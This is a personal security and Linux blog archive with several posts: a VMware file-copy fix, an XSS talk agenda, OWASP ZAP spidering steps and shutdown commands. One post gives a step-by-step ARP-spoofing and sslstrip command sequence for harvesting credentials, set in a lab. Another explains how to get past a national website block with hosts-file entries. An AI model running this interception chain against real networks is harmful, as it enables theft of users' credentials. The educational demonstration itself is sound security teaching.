Computers, Programming, Technology, Music, Literature

Archive for the ‘linux’ Category

Fixing VMWare Player Cannot write to local file Cancelling the file copy operation

leave a comment »

 

 

PROBLEM: When copying files from VMWare player to the host (Windows host in this case), you get “Cannot write to local file”.

SOLUTION: Make space. Clear temp and %temp% directories, on your operating system drive.

 

I was trying to copy 5 GB of files from my VMWare player guest OS Kali Linux to my Windows Host. VMWare player displays Copying file “part2.rar” from virtual machine and exits with “Cannot write to local file. Cancelling the file copy operation.”.

 

image

image

This knowledge base from vmware hints disabling tempfs in linux operating systems.  https://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=2056353 

I looked at the temp and %temp%  windows directories and dicovered the below temp location  where VMWarePlayer copies the files from the VM Guest, and from there it copies to the destination directory in the host OS.

image

My Operating System drive C: was full, and I had to clear the temp directories and free up some space to do 5 GB copy operation from WMWare Player Guest Kali Linux to Windows Host.

Written by gmaran23

March 3, 2017 at 6:30 pm

Devouring Security: Cross Site Scripting [XSS]

leave a comment »

 

 

http://www.slideshare.net/gmaran23/insufficient-data-validation-risks-xss

 

 

 

 

Agenda in <ul><li>

 

·         Risk, Stories & the news

·         XSS Anatomy

·         Untrusted Data Sources – Well, Where did that come from?

·         Shouldn’t it be called CSS instead?

·         Types of XSS

          Type 0 [DOM based]

          Type 1 [Reflected or Non-persistent XSS]

          Type 2 [Persistent or Stored XSS]

·         Live Demo: XSS 101 with alert(‘hello XSS world’)

·         Live Demo: Cookie Hijacking and Privilege Escalation

          Face/Off with John Travolta and Nicolas Cage

·         Live Demo: Let’s deploy some Key loggers,huh?

·         Mitigations

          Input Sanitization

          Popular Libraries for .Net, Java, php

§  Demo: Input sanitization

          Whitelists (vs. Blackists)

          Output Encoding

§  Contextual

§  Demo: Output Encoding

          Browser Protections & bypasses

          Framework Protections & bypasses

          Content Security Policy (CSP) in brief

·         Secure Code reviews: Spot an XSS, How?

·         Tools: Do we have an option?

·         XSS Buzz and how to Fuzz

·         Renowned Cheat sheets

·         Further reading & References

 

Devouring Security: OWASP ZAP – Successfully Ajax Spidering a website with Authentication

leave a comment »

 

 

 

OWASP ZAP – Successfully Ajax Spidering a website with Authentication (Northwind Products Management)

0. Make sure you are proxying via Zap (I love FoxyProxy)

1. Identify the session cookie

1.1 If the http session is not identified, use the Params tab and flag a Cookie as Session Token [alternatively, go to Tools –> Options.. –> Http Sessions and add a session identifier]

1.2 go do some browsing

2. Set an active session from the Http Sessions tab

3. Identify and exclude the Log off request from the spider (and scanner, and proxy, ir required)

Good luck with your Ajax spidering in ZAP!

Marudhamaran Gunasekaran
renouncedthoughts.wordpress.com/
vimeo.com/gmaran23


 

Also available on YouTube as an official OWASP ZAP video tutorial. Not so HD compared to vimeo. Thanks to Simon Bennets for feedback and sugesstions.

 

 

 

Written by gmaran23

August 29, 2014 at 4:42 pm

Posted in hacks, kali, linux, OWASP, security, Sqli

Devouring Security: Sslstrip and arpspoofing for credential harvesting

leave a comment »

 

 

 

You may think you are connecting to a website over ssl, but did you forget to check https at the address bar?

 

 

http://www.thoughtcrime.org/software/sslstrip/

 

 

Victim – Windows 7 – 192.168.100.11

Attacker – Kali linux – 192.168.100.215

 

arpspoof gateway – 192.168.100.1

 

 

•Flip your machine into forwarding mode.

echo "1" > /proc/sys/net/ipv4/ip_forward

 

•Run arpspoof to convince a network they should send their traffic to you.

arpspoof -i <interface> -t <targetIP> <gatewayIP>

 

arpspoof -i eth0 -t 192.168.100.11 192.168.100.1

 

•Setup iptables to redirect HTTP traffic to sslstrip.

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port <listenPort>

 

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000

 

•Run sslstrip.

sslstrip.py -l <listenPort>

 

sslstrip

 

Written by gmaran23

July 4, 2014 at 8:58 pm

unblock uploaded.net with hosts file entry

with 25 comments

,

Scroll to the solution section or click here if you want to skip some rant.

It’s May 1, I live in India, I desperately wanted to download some learning material, and uploaded.net is blocked here. Well, say ‘fuck’ to the government’s censorship. I used to think it was the imbecile firewall at my office, but when it tried at my home internet recently, IE gives PCBD, and chrome gives you bummer. I did not want to use a web proxy right off, because sometimes they just do not work with AJAX enabled, cookie enabled websites. And most of them do not support file downloads (at least in my experience, may be i haven’t tried harder).

I hate it when the security builders leave loopholes, and hide behind the face of the infamous dialog in the security industry ‘Nothing is 100% secure’. Well, you forgot the basics. When you block a website, you don’t block it based on the domain name. You got to be more advanced than a firewall using school kid.

I will show you a simple hosts file entry technique here to bypass the tyranny.

 

Wow, don’t I relish and cherish to be a computer engineer. Happy labor day.

 

Img src: http://www.imgion.com/images/01/Celebater-This-Day-With-Labour-.gif

 

Problem

When you try to access uploaded.net, you can’t connect to the server. Both http, and https equivalent of the links. Your nslookup, ping fails. Somehow you manage to get the up of uploaded.net from online dns lookup websites, and instead of http://uploaded.net you try the ip http://81.171.123.200/, even then you can’t connect.

Screenshot_050114_041052_PMScreenshot_050114_043104_PM

 

Solution

1. Go to you favorite DNS look up website, mine happens to me http://ping.eu/nslookup/

2. Look up http://uploaded.net and get the ip addess

Screenshot_050114_043343_PM

3. Add a hosts file entry to uploaded.net as 81.171.123.200. (Remember the ip address of uploaded.net may change from the time of this writing). Windows hosts file location C:\Windows\System32\drivers\etc\hosts. Linux hosts file location /etc/hosts. Open a notepad as admin (if UAC enabled in Windows Vista or abobe), use sudo in linux for your favorite text editor (gedit Smile with tongue out), if not running as root.

 

Screenshot_050114_043837_PM

4. Save the hosts file, breath the air of liberation. (and a free chick ad)

Screenshot_050114_044024_PM

5. Click the Free Download, or Premium Download (if you own a Villa, and not happen to be a miser)

6. Once your download link is generated, you get another bummer, this time the URL in the address bar happens to be a subdomain of uploaded.net with different IP address, and hence blocked. Hang on, let’s copy the complete FQDN of the server, and do a DNS look up at http://ping.eu/nslookup/

Screenshot_050114_044419_PM

7. DNS look up of http://fra-7m15-stor07.uploaded.net/ at http://ping.eu/nslookup yields an ip – 81.171.103.83. Add a host entry for the same server and ip. (Note: the download server may vary based on your location, make sure you copy the correct server name from the address for a dns lookup)

Screenshot_050114_044614_PM

image

8. Go back to your browser, hit the refresh button. See the magic.

image

 

Once again, happy labor day!

 

 

Update – Aug 9 2014 – Some commenter said it does not work anymore, so here’s a screenshot for you today. Still works.

image

Written by gmaran23

May 1, 2014 at 5:04 pm

quick shutdown options in backtrack 5

leave a comment »

 

Just got my BT5R3 (BackTrack 5 Release 3) on a VMWare player. Tried the shutdown command, didn’t work as expected. All that happens after the shuwdown command is the computer shuts down, but it does not switch the power off. Here’s below a lot of ways in which you can shutdown your Back Track with power off option.

Courtesy of and Compiled from http://www.backtrack-linux.org/forums/showthread.php?t=42508

Any of the below commands work just super fine.

halt

shutdown -P now

shutdown -Ph now

shutdown -now

shutdown -h 0

poweroff

Written by gmaran23

December 19, 2013 at 5:34 pm

Posted in backtrack, linux

Tagged with , , , ,